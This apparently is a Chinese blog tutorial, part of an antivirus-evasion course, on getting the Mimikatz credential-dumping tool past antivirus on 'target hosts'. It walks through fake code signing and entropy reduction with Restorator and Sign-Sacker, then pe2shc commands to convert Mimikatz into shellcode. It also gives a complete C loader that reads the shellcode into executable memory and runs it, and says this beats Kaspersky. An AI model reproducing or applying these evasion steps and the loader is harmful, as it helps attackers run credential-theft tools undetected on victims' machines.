安全工具篇&MIMikatz&提权EXP&非源码修改方式&PE转ShellCode&融入加载

免杀对抗------第一百六十一天

安全工具篇&MIMikatz&提权EXP&非源码修改方式&PE转ShellCode&融入加载

前置知识

  • 来到免杀的最后一部分内容,之后这几讲针对的是一些安全工具的免杀,因为很多黑客工具(C2、nc、Mimikatz等)都会被杀软标记并查杀,所以这几节我们学习的就是如何让他们放到目标主机上不被干掉
  • 那我们和之前的ShellCode免杀一样,可以从如下两方面入手:
    1. 成品EXE
    2. 程序源代码
  • 因此首先我们需要分析的就是:
    1. 安全工具是否具有源代码
    2. 安全工具源代码逻辑的复杂程度
    3. 当前源代码你是否具有能力去修改
  • 然后我们还需要考虑:
    1. 如果没有源代码或者没有修改的能力怎么办
    2. 在修改的时候发生各种异常bug或者打包问题怎么办
    3. 修改重打包之后的免杀效果也不太好时怎么办
  • 那针对上面的这样一些情况,我们可以采用如下的两种方式去处理:
    • 非源码修改方式
      1. 直接对EXE程序加壳、加保护、签名、详细信息、熵等
      2. 转换为ShellCode然后利用加载器进行加载到内存上线
    • 源码修改方式
      1. 魔改源码打乱特征的方法重新定义工具
      2. 参考源码自己写一个同类工具
  • 那免杀的效果也是从上到下依次递增,当然难度也逐渐递增,本节课我们就以Mimikatz工具针对于第一种非源码修改方式去看看效果
  • mimikatz下载地址:gentilkiwi/mimikatz: A little tool to play with Windows security
  • 直接上传到目标主机直接就给杀了,火绒都过不了:

安全工具 - EXE处理-减少熵值&自签名&详细信息

  • 首先我们如果要直接对EXE成品文件进行免杀的话,根据之前的内容的就是减小熵值、加签名等等操作

  • 那所以直接用我们的工具Restorator进行操作:

  • 然后用我们的加签名工具Sign-Sacker加上签名:

  • 然后再放到目标主机上,会发现没有任何屁用,依旧被火绒给干掉了:

  • 根本原因就是因为源码没有改动,特征码被识别,但是这种方法针对360还是有一定用处的

  • 当然因为这里可以直接下载源码,所以我们可以将源码下载下来本地打包一下,有时候也能起到一定的免杀效果

  • 用VS打开,先尝试编译一下看能不能正常生成EXE文件,如果报错"Microsoft.CppBuild.targets(463,5): error MSB8020: 无法找到 v141_xp 的生成工具(平台工具集 ="v141_xp")..."的问题,那就在如下这几个文件夹中将所有.vcxproj文件中的v141_xp替换为自己的工具集版本,我这里是v143

  • 参考链接:https://www.cnblogs.com/xijiajia/p/16209248.html

  • 如果报错"Microsoft\VC\v170\Microsoft.CppBuild.targets(504,5): error MSB8041: 此项目需要 MFC 库...",那么打开Visual Studio Installer软件,点击修改下载红色框中选中的内容即可,参考解决链接:https://blog.51cto.com/u_15707179/12789442

  • 下载完成后打开VS选择项目属性,修改如下配置:

  • 之后生成项目即可编译成功,但是这个也是没有,依旧被查杀,所以第一种方式直接对成品EXE程序下手实现免杀是很难的

安全工具 - EXE处理-PE转ShellCode&加载分离混淆

  • 于是我们介绍第二种方式,既然直接对EXE修改没有效果,因为有特征码,那我们将该EXE转为二进制的形式,通过Loader加载到内存,像之前的ShellCode一样就可以尝试绕过特征码检测实现免杀
  • 这里我们可以用到这个工具进行转换:hasherezade/pe_to_shellcode: Converts PE into a shellcode
shell 复制代码
.\pe2shc.exe mimikatz mm.bin
  • 然后我们可以通过它自带的加载器加载:
shell 复制代码
.\runshc64.exe mm.bin
  • 但是吧,这个工具特征好像也有点明显了,这个mm.bin文件也会被直接杀掉,所以我们要么异或一下,要么换个工具
  • 这里我就直接换个工具了,也懒得写脚本了,新工具地址:Shellcode_Build
  • 当然,我们也不可能直接用它的这个加载器,因为它的这玩意也是被杀得不要不要的,这里我们就搬出之前的加载器用一用,或者让AI帮我们写一个:
c 复制代码
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main() {
    // 1. 打开bin文件
    FILE* file = fopen("xx.bin", "rb");
    if (!file) {
        printf("无法打开文件 xx.bin\n");
        return 1;
    }

    // 2. 获取文件大小
    fseek(file, 0, SEEK_END);
    long fileSize = ftell(file);
    fseek(file, 0, SEEK_SET);

    // 3. 分配内存
    unsigned char* buffer = (unsigned char*)malloc(fileSize);
    if (!buffer) {
        printf("内存分配失败\n");
        fclose(file);
        return 1;
    }

    // 4. 读取文件内容
    size_t bytesRead = fread(buffer, 1, fileSize, file);
    fclose(file);

    if (bytesRead != fileSize) {
        printf("文件读取不完整\n");
        free(buffer);
        return 1;
    }

    printf("成功加载 %zd 字节\n", bytesRead);

    // 5. 分配可执行内存
    void* execMem = VirtualAlloc(NULL, fileSize,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
    if (!execMem) {
        printf("无法分配可执行内存\n");
        free(buffer);
        return 1;
    }

    // 6. 将shellcode复制到可执行内存
    memcpy(execMem, buffer, fileSize);

    // 7. 执行shellcode
    printf("正在执行ShellCode...\n");
    ((void(*)())execMem)();

    // 8. 清理
    VirtualFree(execMem, 0, MEM_RELEASE);
    free(buffer);

    return 0;
}
  • 可以看到能够成功过掉卡巴,然后也能正常运行:

  • 所以以后如果需要上传一些工具到目标主机上时,可以使用这种方式去进行加载使用,目前看来效果其实还可以,因为我们之前的加载器免杀方式其实有很多,只需要对着改即可

相关推荐
小手智联老徐4 小时前
OpenClaw 2026.4.10 发布:主动记忆系统登场,多平台集成与安全能力全面升级
安全·ai编程·openclaw
炽烈小老头4 小时前
【每天学习一点算法 2026/04/11】Pow(x, n)
学习·算法
旖-旎4 小时前
哈希表(存在重复元素)(3)
数据结构·c++·学习·算法·leetcode·散列表
weixin_513449964 小时前
walk_these_ways项目学习记录第九篇(通过行为多样性 (MoB) 实现地形泛化)--学习算法
学习·算法·机器学习
夜猫逐梦4 小时前
【AI】 Claude Code 源码泄露:一场关于安全与学习的风波
人工智能·安全·claude code·源码泄漏
qq_381338504 小时前
TypeScript 类型安全与类型体操实战:从入门到精通
javascript·安全·typescript
chh5635 小时前
C++--内存管理
java·c语言·c++·windows·学习·面试
CNemon5 小时前
《怎样学习文言文》溯源
学习
wayz115 小时前
21天机器学习核心算法学习计划(量化方向)
学习·算法·机器学习
Flandern11115 小时前
Go程序员学习AI大模型项目实战02:给 AI 装上“大脑”:从配置解包到流式生成的深度拆解
人工智能·后端·python·学习·golang